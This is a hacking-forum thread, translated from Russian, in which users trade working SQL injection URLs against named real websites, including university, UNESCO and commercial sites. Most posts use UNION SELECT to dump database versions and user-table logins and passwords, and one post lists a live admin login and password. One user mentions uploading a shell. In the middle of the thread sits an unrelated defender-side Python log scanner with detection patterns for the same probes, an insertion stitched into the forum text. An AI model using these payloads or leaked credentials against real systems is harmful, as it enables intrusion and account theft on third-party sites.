SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n1†R0x

    reel-stream.com
    Code:
    http://www.reel-stream.com/headline.php?id=-1+union+select+concat(email,0x3a,password),2,3,4+from+user/*
    passwords in plaintext
     
    1 person likes this.
  2. banned

    Listing all tables
    Code:
    http://opticalnet.ru/articles.phtml?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables/*
    Heh, what privileges we have
    Code:
    http://opticalnet.ru/articles.phtml?id=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name='user'+limit+1,50/*
    Now we'll upload a little shell =)
     
  3. banned

    www.equipnet.ru
    Code:
    http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+convert(concat_ws(0x3b,user(),database(),version())+using+cp1251)/*
     
  4. Barney

    Got up to 15. Didn't try further.
    http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    Although, as I understand it, the ORDER BY construct works like this:
    if there are more than, say, 15 columns, we get a correct response; if fewer, an error.
    So there.
    http://astrol.ru/index.php?page=125'+order+by+15/*
     
  5. n1†R0x

    Code:
    http://astrol.ru/index.php?page=125+order+by+7/*
    Code:
    http://astrol.ru/index.php?page=125+order+by+8/*
    at 8 there's an error, so there are fewer than 8 columns
    at 7 there's no error, so there are 7 columns, logical?

    Code:
    http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,5,6,7/*
    rtfm

    ps: anticipating the next question:
    output goes to column 5... error when outputting 'version()'
    as it turned out, an encoding mismatch.
    http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,convert(version()+using+cp1251),6,7/*
    pps: hm... http://astrol.ru/forum/admin/ a Phorum install)
     
    #2485 n1†R0x, 12 Jun 2007
    Last edited: 12 Jun 2007
    1 person likes this.
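
    A defender-side view of the request sequence in the posts above (ORDER BY with increasing numbers, then UNION SELECT ending in `/*`), as an added example that is not part of the thread: a small access-log scanner. The log lines, client addresses, rule names and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log entries (client IP, request path); not real traffic.
SAMPLE_LOG = [
    ("203.0.113.7", "/index.php?page=125"),
    ("203.0.113.7", "/index.php?page=125+order+by+7/*"),
    ("203.0.113.7", "/index.php?page=125+order+by+8/*"),
    ("203.0.113.7", "/index.php?page=-1+union+select+1,2,3,4,"
                    "convert(version()+using+cp1251),6,7/*"),
    ("198.51.100.4", "/index.php?page=12&sort=order"),
    ("198.51.100.4", "/news.php?id=7"),
]

# Hypothetical rule names; each pattern runs on the decoded parameter value.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "comment_truncation": re.compile(r"/\*\s*$"),
}

def scan_request(path):
    """Return the sorted rule names matched by any decoded query-string value."""
    hits = set()
    # parse_qsl decodes %xx and turns '+' into a space, as the application sees it
    for _name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)

def summarize(log):
    """Group matched rules per client; 'escalated' means probing was followed by UNION."""
    per_client = defaultdict(set)
    for client, path in log:
        per_client[client].update(scan_request(path))
    return {
        client: {"rules": sorted(rules),
                 "escalated": {"order_by_probe", "union_select"} <= rules}
        for client, rules in per_client.items() if rules
    }

if __name__ == "__main__":
    for client, finding in summarize(SAMPLE_LOG).items():
        print(client, finding)
```

    Matching on the decoded value rather than the raw URL is what lets the same rules catch both the `+` and `%20` spellings of a request.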
  6. banned

    www.sacr.sk
    Code:
    http://sacr.sk/article?id=-1+union+select+concat_ws(0x3b,user(),database(),version()),2/*&category=&lang=ru
     
  7. }{0TT@БЬ)Ч

    2Barney
    and here's the admin himself
    Code:
    http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,char(48),user_password),6,7+from+phpbb_users+limit+1,1/*
     
    2 people like this.
  8. Ky3bMu4

    http://www.databasepublish.com/
    Code:
    http://www.databasepublish.com/news.php?id=-51+union+select+1,version(),user(),4,5,6,7,8,9,10,11+from+users/*
    
    And there's even access to the users table! But it flatly refuses to output password. It redirects to index.


    http://www.grid.iu.edu/
    Code:
    http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,user(),4,version(),6,7,8/*
    
    And a few small ones:
    Code:
    http://www.insanelygreatmac.com/news.php?id=-3571+union+select+concat(user(),1,version())/*
    http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version())/*
    http://www.kaldor.com/media-release.php?id=-5+union+select+concat(user(),version())/*
    
     
  9. Aerot1smo

    http://canadatype.com/showfont.php?id=-1+union+select+version(),2,3,4,5,6/*
    http://www.big6.com/showenewsarticle.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
     
    #2489 Aerot1smo, 12 Jun 2007
    Last edited by a moderator: 12 Jun 2007
    1 person likes this.
  10. Серенький

    sql

    Bi-2 (the band's official site)

    http://www.bdva.ru/

    -> version is 5

    the names of all tables and columns are output without a limit by means of the query:
    -> there's a forum, phpbb_users.
    There's also a table where passwords appear - radio_users
     
    2 people like this.
  11. banned

    www.stanford.edu
    version() - 5
    Code:
    http://www.stanford.edu/group/irepp/cgi-bin/event-detail-popup.php?recordID=-1+union+select+1,concat_ws(0x3b,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
    honors.uoregon.edu
    Code:
    http://honors.uoregon.edu/faculty/profiles/index.php?id=-12'+union+select+1,2,3,4,5,concat_ws(0x3b,user(),database(),version()),7,8,9,10,'Mafia%20Of%20Antichat',12,13,14,15,16/*
     
    #2491 banned, 13 Jun 2007
    Last edited: 13 Jun 2007
  12. BromTyZ

    Please help me find the name of the table with the users (admin)!
    Code:
    http://sexsihop.in.ua/detail.php?detail=-1+union+select+1,2,3,4,5,6,7,8
     
    #2492 BromTyZ, 13 Jun 2007
    Last edited: 13 Jun 2007
    1 person likes this.
  13. Ky3bMu4

    Somehow, no luck today. :( :( :(
    Code:
    http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version()),2,3,4,5/*
    http://www.pimpsurveys.com/view-survey.php?id=737+union+select+1,user(),version(),database()/* - at the very bottom.
    
     
  14. hitex

    http://www.crim.ncsu.edu/
    Code:
    http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,name,pwd),17+from+user/*
    http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,user_login,user_pass),1+from+wp_users+limit+0,2/*
     
    1 person likes this.
  15. _Pantera_

    Code:
    http://women.unesco.kz/base.php?id=-2+union+select+concat(login,char(58),pwd)+from+users+limit+0,1/*
     
    3 people like this.
  16. hitex

    Code:
    http://intercar.com.ua/index.php?id=-20+union+select+1,2,concat_ws(0x3b20,user(),database(),version()),4,5,6/*
     
    1 person likes this.
  17. V.I.P

    Site: pec.spb.ru
    http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,password,email),3+from+users+limit+8,1/*
     
    1 person likes this.
  18. Серенький

    adm

    http://pec.spb.ru/admin/
    login: kos
    pass: s11111

    ---------------------------------------------------------------------------

    http://sexshop.in.ua/detail.php?detail=-1+union+select+1,2,3,concat_ws(0x3a,name,email,icq,phone),5,6,7,8+from+clients+limit+1,1/*
     
    #2498 Серенький, 13 Jun 2007
    Last edited: 13 Jun 2007
    4 people like this.
  19. Constantine

    Code:
    http://besoch.com/?p=viewsoch&autor=tvardovsky&id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3/*
    =\
     
    1 person likes this.
  20. Aerot1smo

    please help me find the table name
    http://www.allaboutjazz.com/php/article.php?id=-1+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*
     
    1 person likes this.